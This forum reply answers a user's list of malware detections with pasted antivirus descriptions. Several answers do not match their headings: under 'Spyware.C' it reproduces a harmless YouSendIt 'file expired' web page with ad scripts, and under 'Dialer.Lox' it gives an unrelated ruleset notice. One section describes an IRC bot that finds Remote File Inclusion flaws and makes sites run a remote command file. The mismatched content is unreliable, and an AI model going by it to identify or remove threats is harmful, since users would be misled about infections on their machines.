S3th wrote:Win32.Zafi.B trojian monitors, files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17
Anyone know what these are and how to remove them without any antivirus?
What is Win32.Zafi.B
Win32/Zafi.B is a worm spreading via e-mail and P2P networks.
Zafi.B worm is a moderately destructive worm that may cause antivirus and security products to stop working. It also may overwrite executables of installed security products. Zafi also disables RegEdit, MSconfig and the Task Manager and may also launch a DoS attack against several Hungarian web sites.
You can yourself search your computer manually.
Trojan.Zlob.B is a Trojan horse that opens a back door and allows a remote attacker to perform various actions on the compromised computer.
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Distribution
Distribution Level: Low
Spyware.C
sfx.exe content:
<SCRIPT language="javascript" src="
http://lads.yousendit.com/mirror/YSImir ... "></SCRIPT>
<center>
<html> <script src="/__utm.js" type="text/javascript"></script> <head> <meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>YouSendIt: The Leader in File Delivery.</title>
<link href="site.css" rel="STYLESHEET" type="text/css">
<script LANGUAGE="JavaScript">
<!-- Begin
image1 = new Image();
image1.src = "images/b_services1.jpg";
image2 = new Image();
image2.src = "images/b_solutions1.jpg";
image3 = new Image();
image3.src = "images/b_support1.jpg";
image4 = new Image();
image4.src = "images/b_company1.jpg";
// End -->
</script>
<script type="text/javascript">
var randnum = Math.random();
var inum = 11;
// Change this number to the number of images you are using.
var rand1 = Math.round(randnum * (inum-1)) + 1;
images = new Array
images[1] = "images/top1.jpg"
images[2] = "images/top2.jpg"
images[3] = "images/top3.jpg"
images[4] = "images/top4.jpg"
images[5] = "images/top5.jpg"
images[6] = "images/top6.jpg"
images[7] = "images/top7.jpg"
images[8] = "images/top8.jpg"
images[9] = "images/top9.jpg"
images[10] = "images/top10.jpg"
images[11] = "images/top11.jpg"
// Ensure you have an array item for every image you are using.
var image = images[rand1]
</script>
</head>
<BODY bgcolor="#ffffff" id="body1" scroll="yes">
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td rowspan="32" align="top" width="210"><a href="http://www.yousendit.com"><img src="images/ysi_logo_frontpage.jpg" border="0"></a></td>
<td width="518" colspan="2">
<script language="javascript">
<!--
document.write('<img src="'+image+'">')
-->
</script>
</td>
</tr>
<tr>
<td class="smallGrey" align="right">Delivering over 43,973,865,717,760 bytes per day | <strong>What are you sending?</strong></td>
<td><img src="images/dot.gif" width="8" height="8"></td>
</tr>
</table>
</td>
</tr>
<tr><td height="7"></td></tr> <!-- space between "transferring" and blue nav bar -->
</table>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td width="728" height="19" bgcolor="#3366cc" align="right" class="content"><a class="white" href="community.aspx"> YSI Community </a><a class="white" href="solutions.aspx">| Business Solutions </a><a class="white" href="advertise.aspx">| Advertise </a></td>
</tr>
<tr>
<td colspan="2" height="3"></td> <!-- space between blue nav bar and content of page -->
</tr>
</table>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<iframe src="dart/expired 728x90.aspx" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
<table cellpadding="0" cellspacing="0" width="728" height="300" bgcolor="#ffffff" border="0">
<tr>
<td class="content" align="left" width="167">
<table width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td width="20"></td>
<td width="*" align="left" valign="top">
<a href="howdoesitwork.aspx" class="currentpage"><br><br><br>
<img src="images/arrow_sm.jpg" border="0">How does it work?</a><br>
<a href="whyyousendit.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Why YouSendIt?</a><br>
<a href="abuse.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Report Abuse</a><br>
<a href="community.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Get Involved!</a><br><br>
</td>
<!-- <td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td> -->
</tr>
</table>
</td>
<td class="content" width="561" valign="top"><br>
<table cellpadding="0" cellspacing="0" height="250" border="0">
<tr>
<td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td>
<td width="205" class="content_bigger" valign="top">
<font class="subtitle">Your file has expired.</font><br><br>
Unfortunately, your file has expired. A link is valid
for 7 days or a limited number of downloads, whichever occurs first.<br><br>
Once the link expires, the file is deleted and
cannot be recovered.
</td>
<td width="10"></td>
<td width="336" valign="top">
<center>
<font size="-2">ADVERTISEMENT - Clicking will not affect download.</font><br>
<iframe src="dart/expired 300x250.aspx" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<!-- Begin BidClix Code -->
<script language="javascript" type="text/javascript">
<!--
document.write('<s'+'cript src="
http://ads.bidclix.com/code/64469/?cb='+
(new Function
("var d=new Date();var u=Date.UTC(d.getUTCFul"
+"lYear(),d.getUTCMonth(),d.getUTCDay(),d.get"
+"UTCHours(),d.getUTCMinutes(),d.getUTCSecond"
+"s(),d.getUTCMilliseconds());return u+'-'+Ma"
+"th.random();"
))()
+'"><'+'/script>');
// -->
</script>
<noscript>
<iframe src="
http://ads.bidclix.com/serve-page/?id=64469" width="740" height="125" scrolling="no" frameBorder="0">
<a href="
http://ads.bidclix.com/serve-link/?id=64469" target="_blank"><img src="
http://ads.bidclix.com/serve-image/?id=64469" width="740" height="125" border="0" alt="" /></a>
</iframe>
</noscript>
<!-- End BidClix Code -->
<table cellpadding="2" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr align="center">
<td colspan="2" align="center">
<hr noshade color="#CCCCCC" size="1">
</td>
</tr>
<tr height="19">
<td class="smallGreen" align="left"><strong>YouSendIt</strong> © 2005</td>
<td width="555" bgcolor="#7FC31C" align="right" class="content"> <a class="white" href="privacy.aspx">Privacy Policy | </a> <a class="white" href="tos.aspx">Terms of Service | </a> <a class="white" href="dmca.aspx">DMCA Policy</a> <a href="company.aspx" class="white"> | Company </a><a href="support.aspx" class="white">| Support </a></td>
</tr>
</table>
<!-- BEGIN DART -->
<script language="Javascript">
<!--
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;
//-->
</script>
<SCRIPT LANGUAGE="JavaScript">
document.write('<SCRIPT LANGUAGE="JavaScript1.1" SRC="
https://ad.doubleclick.net/adj/expired. ... sect=;ord=' + ord + '?" ><\/SCRIPT>');
</SCRIPT>
<SCRIPT>
if ((!document.images && navigator.userAgent.indexOf("Mozilla/2.") >= 0) || navigator.userAgent.indexOf("WebTV")>= 0) {
document.write('<A HREF="
https://ad.doubleclick.net/jump/expired ... sect=;ord=' + ord + '?" TARGET="_blank">');
document.write('<IMG SRC="
https://ad.doubleclick.net/ad/expired.y ... sect=;ord=' + ord + '?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>');
}
</SCRIPT>
<NOSCRIPT>
<A HREF="
https://ad.doubleclick.net/jump/expired ... =123456789?" TARGET="_blank">
<IMG SRC="
https://ad.doubleclick.net/ad/expired.y ... =123456789?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>
</NOSCRIPT>
<!-- END DART -->
<iframe src="
http://a.as-us.falkag.net/dat/dlv/aslfr ... =0&mod=111" width="1" height="1" scrolling="no" frameBorder="0"></iframe>
</body>
</html>
Technical details
This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.Payload
This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.
Depending on the commands received, the bot can:
wipe log files
search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program ctreats a request which redirects the address to the following link:
http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.
The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-
Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).
Dialer.Lox
An updated TrojanHunter ruleset, containing 27639 ruleset entries, is available. This update adds 5 new trojan definitions:
I hope this gave you the answer to your question. And sorry I couldent get information on PackedMassAccess
Spyware.Nod17
Sorry.
